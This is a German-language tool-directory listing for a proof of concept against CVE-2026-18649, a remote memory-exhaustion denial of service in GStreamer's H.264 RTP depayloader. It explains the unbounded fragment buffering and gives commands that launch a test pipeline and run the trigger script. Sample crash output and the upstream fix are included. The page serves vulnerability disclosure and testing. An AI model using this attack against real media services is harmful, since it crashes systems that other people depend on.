Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-18649 — Proof of Concept für CVE-2026-18649, eine Remote-Denial-of-Service-Schwachstelle im H.264-RTP-Depayloader (rtph264depay) von GStreamer. | Kitploit
Tools/GitHubGitHub/0xsemizzz/cve-2026-18649
Payload-GenerierungSchwachstellenanalyseExploitationNetzwerksicherheit
GitHub0xsemizzz/cve-2026-18649

CVE-2026-18649

Proof of Concept für CVE-2026-18649, eine Remote-Denial-of-Service-Schwachstelle im H.264-RTP-Depayloader (rtph264depay) von GStreamer.

Repository anzeigen
12vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-18649 - GStreamer rtph264depay DoS durch unbegrenztes Speicherwachstum

Proof of Concept für eine Ressourcenerschöpfungs-Schwachstelle im H.264-RTP-Depayloader von GStreamer (rtph264depay). Das gleiche Muster betrifft auch rtph265depay.

Was es ist

Während der Reassemblierung fragmentierter H.264-FU-A-RTP-Pakete wird jedes eingehende Fragment in einen internen GstAdapter-Puffer ohne Größenbegrenzung geschoben. Der Adapter leert sich nur, wenn das End-of-Fragment-Bit (E) im FU-Header gesetzt ist. Ein entfernter Angreifer sendet ein gültiges Startfragment und dann einen endlosen Strom von Fortsetzungsfragmenten, ohne jemals das E-Bit zu setzen. Der Puffer wächst weiter, bis dem Prozess der Speicher ausgeht und er abstürzt.

  • Remote, keine Authentifizierung erforderlich
  • Verwendet nur gültige RTP-Pakete, keine fehlerhaften Daten
  • Ein Stream reicht aus, kein Flooding oder mehrere Verbindungen erforderlich

CVE-Details

  • CVE: CVE-2026-18649 (NVD)
  • CWE: CWE-770 (Speicherzuweisung ohne Grenzen oder Drosselung)
  • CVSS: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • Gefunden von: Yehia Ali Mohamed Ezzat (0xsemizzz)

Vollständiger Bericht: 0xsemizzz.vercel.app/projects/gstreamer-cve

Betroffene Versionen

gst-plugins-good vor dem Upstream-Fix. Bestätigt auf 1.28.2 (Ubuntu 24.04).

Schnellstart

Starte eine Pipeline und führe dann den PoC aus:

root@kitploit:~
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
PID=$!
python3 trigger.py 5036 $PID

Für einen schnellen Absturz füge ein Speicherlimit hinzu:

root@kitploit:~
ulimit -v 262144   # 256 MB, process dies in about 12 seconds
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
python3 trigger.py 5036 $!

Erwartete Ausgabe

root@kitploit:~
[*] port=5036  1 fragment every 0.5ms  (~2.8 MB/s)
[*] monitoring VmData (heap), not RSS
[*] target PID=12345  baseline VmData=26 MB

      5000 frags  ~     7 MB sent  |  VmData=35MB (+8MB)
     10000 frags  ~    13 MB sent  |  VmData=44MB (+17MB)
     15000 frags  ~    20 MB sent  |  VmData=53MB (+26MB)
     20000 frags  ~    27 MB sent  |  VmData=62MB (+35MB)
     25000 frags  ~    33 MB sent  |  VmData=71MB (+44MB)
     30000 frags  ~    40 MB sent  |  VmData=79MB (+53MB)
     ...
     DEAD

Der Fix

Eine max-reassembly-size-Eigenschaft wurde zu rtph264depay und rtph265depay hinzugefügt. Anwendungen sollten sie auf einen angemessenen Wert setzen (16 MB für Video ist typisch). Der Standardwert ist 0 (unbegrenzt) für Abwärtskompatibilität.

Tool herunterladen